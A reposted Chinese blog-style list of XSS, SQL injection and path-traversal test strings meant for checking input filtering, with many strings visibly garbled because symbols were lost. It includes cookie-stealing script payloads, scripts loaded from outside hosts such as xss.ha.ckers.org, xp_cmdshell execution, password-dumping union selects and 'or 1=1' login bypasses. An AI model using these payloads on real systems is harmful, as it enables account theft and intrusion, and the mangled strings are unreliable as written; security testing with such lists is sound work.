之前好像转载过一篇类似的,记不清了,再复习一下。下面是常见的 XSS、SQL 注入和路径遍历测试字符串,可用来检查输入过滤和输出编码是否到位;注意转载时部分特殊符号已丢失,以下字符串并非原样。
scriptalert(document.cookie)/script =scriptalert(document.cookie)/script scriptalert(document.cookie)/script scriptalert(vulnerable)/script 3Cscript3Ealert(XSS)3C/script3E s#99riptalert(XSS)/script imgsrc="javas#99ript:alert(XSS)" 0a0ascriptalert(\"Vulnerable\")/script.jsp 223cscript3ealert(22xss22)3c/script3e 2e2e/2e2e/2e2e/2e2e/2e2e/2e2e/2e2e/etc/passwd 2E2E/2E2E/2E2E/2E2E/2E2E/windows/win.ini 3c/a3e3cscript3ealert(22xss22)3c/script3e 3c/title3e3cscript3ealert(22xss22)3c/script3e 3cscript3ealert(22xss22)3c/script3e/index.html 3f.jsp 3f.jsp ltscriptgtalert(Vulnerable)lt/scriptgt scriptalert(Vulnerable)/script ?sql_debug=1 a5c.aspx a.jsp/scriptalert(Vulnerable)/script a/ a?scriptalert(Vulnerable)/script "scriptalert(Vulnerable)/script execmaster..xp_cmdshelldirc:c:\inetpub\wwwroot\?.txt 223E3Cscript3Ealert(document.cookie)3C/script3E 3Cscript3Ealert(document.domain)3C/script3E 3Cscript3Ealert(document.domain)3C/script3ESESSION_ID={SESSION_ID}SESSION_ID= 1unionallselectpass,0,0,0,0fromcustomerswherefname= ../../../../../../../../etc/passwd ..\..\..\..\..\..\..\..\windows\system.ini \..\..\..\..\..\..\..\..\windows\system.ini !"XSS={()} IMGSRC="javascript:alert(XSS)" IMGsrc="/BLOG/javascript:alert"(XSS) IMGsrc="/BLOG/JaVaScRiPt:alert"(XSS) IMGsrc="/BLOG/JaVaScRiPt:alert"(quotXSSquot) IMGSRC=#106#97#118#97#115#99#114#105#112#116#58#97#108#101#114#116#40#39#88#83#83#39#41 IMGSRC=#0000106#0000097#0000118#0000097#0000115#0000099#0000114#0000105#0000112#0000116#0000058#0000097#0000108#0000101#0000114#0000116#0000040#0000039#0000088#0000083#0000083#0000039#0000041 IMGSRC=#x6A#x61#x76#x61#x73#x63#x72#x69#x70#x74#x3A#x61#x6C#x65#x72#x74#x28#x27#x58#x53#x53#x27#x29 IMGSRC="jav#x09ascript:alert(XSS)" IMGSRC="jav#x0Aascript:alert(XSS)" IMGSRC="jav#x0Dascript:alert(XSS)" "IMGsrc="/BLOG/java"\0script:alert(\"XSS\")"out IMGSRC="javascript:alert(XSS)" SCRIPTa=/XSS/alert(a.source)/SCRIPT BODYBACKGROUND="javascript:alert(XSS)" BODYONLOAD=alert(XSS) IMGDYNSRC="javascript:alert(XSS)" 
IMGLOWSRC="javascript:alert(XSS)" BGSOUNDSRC="javascript:alert(XSS)" brsize="{alert(XSS)}" LAYERSRC="http://xss.ha.ckers.org/a.js"/layer LINKREL="stylesheet"HREF="javascript:alert(XSS)" IMGsrc="/BLOG/vbscript:msgbox"("XSS") IMGSRC="mocha:[code]" IMGsrc="/BLOG/livescript:[code]" METAHTTP-EQUIV="refresh"CONTENT="0url=javascript:alert(XSS)" IFRAMEsrc="/BLOG/javascript:alert"(XSS)/IFRAME FRAMESETFRAMEsrc="/BLOG/javascript:alert"(XSS)/FRAME/FRAMESET TABLEBACKGROUND="javascript:alert(XSS)" DIVSTYLE="background-image:url(javascript:alert(XSS))" DIVSTYLE="behaviour:url(http://www.how-to-hack.org/exploit.html)" DIVSTYLE="width:expression(alert(XSS))" STYLE@im\port\ja\vasc\ript:alert("XSS")/STYLE IMGSTYLE=xss:expre\ssion(alert("XSS")) STYLETYPE="text/javascript"alert(XSS)/STYLE STYLETYPE="text/css".XSS{background-image:url("javascript:alert(XSS)")}/STYLEACLASS=XSS/A STYLEtype="text/css"BODY{background:url("javascript:alert(XSS)")}/STYLE BASEHREF="javascript:alert(XSS)//" getURL("javascript:alert(XSS)") a="get"b="URL"c="javascript:"d="alert(XSS)"eval(a+b+c+d) XMLSRC="javascript:alert(XSS)" "BODYONLOAD="a()"SCRIPTfunctiona(){alert(XSS)}/SCRIPT" SCRIPTSRC="http://xss.ha.ckers.org/xss.jpg"/SCRIPT IMGSRC="javascript:alert(XSS)" !#e xeccmd="/bin/echoSCRIPTSRC"!#e xeccmd="/bin/echo=http://xss.ha.ckers.org/a.js/SCRIPT" IMGSRC="http://www.thesiteyouareon.com/somecommand.php?somevariables=maliciouscode" SCRIPTa=""SRC="http://xss.ha.ckers.org/a.js"/SCRIPT SCRIPT=""SRC="http://xss.ha.ckers.org/a.js"/SCRIPT SCRIPTa=""SRC="http://xss.ha.ckers.org/a.js"/SCRIPT SCRIPT"a="SRC="http://xss.ha.ckers.org/a.js"/SCRIPT SCRIPTdocument.write("SCRI")/SCRIPTPTSRC="http://xss.ha.ckers.org/a.js"/SCRIPT AHREF=http://www.gohttp://www.google.com/ogle.com/link/A admin or0=0 "or0=0 or0=0 or0=0# "or0=0# or0=0# orx=x "or"x"="x )or(x=x or1=1 "or1=1 or1=1 ora=a "or"a"="a )or(a=a ")or("a"="a hi"or"a"="a hi"or1=1 hior1=1 hiora=a hi)or(a=a hi")or("a"="a |